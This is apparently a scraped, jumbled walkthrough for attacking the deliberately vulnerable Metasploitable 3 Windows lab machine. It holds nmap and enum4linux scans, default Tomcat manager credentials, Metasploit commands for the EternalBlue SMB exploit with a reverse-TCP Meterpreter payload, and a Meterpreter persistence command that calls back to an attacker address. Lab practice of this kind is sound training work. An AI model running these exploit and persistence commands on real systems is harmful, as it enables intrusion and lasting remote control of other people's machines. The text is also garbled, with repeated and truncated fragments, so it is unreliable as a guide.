Metasploitable 3 Windows Walkthrough Updated -

run persistence -U -i 10 -p 4444 -r 192.168.56.102

Navigate to http://192.168.56.103:80/manager/html . Default credentials: tomcat:s3cret (vulnerable). metasploitable 3 windows walkthrough

enum4linux 192.168.56.103 nmap --script smb-vuln* -p 445 192.168.56.103 Expect to see flagged – yes, Metasploitable 3 is unpatched against it. run persistence -U -i 10 -p 4444 -r 192

PORT STATE SERVICE VERSION 80/tcp open http Apache Tomcat 6.0.20 135/tcp open msrpc Windows RPC 139/tcp open netbios-ssn Samba smbd 3.X 445/tcp open microsoft-ds Windows 2008 R2 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (WinRM) 3306/tcp open mysql MySQL 5.1.66 3389/tcp open tcpwrapped RDP 47001/tcp open http Microsoft HTTPAPI 8182/tcp open unknown SMB (Port 445) – Goldmine: PORT STATE SERVICE VERSION 80/tcp open http Apache Tomcat 6

msfconsole msf6 > search ms17-010 msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set RHOSTS 192.168.56.103 msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 > set LHOST 192.168.56.102 (your Kali IP) msf6 > run If successful (85% of the time), you’ll get a level Meterpreter shell.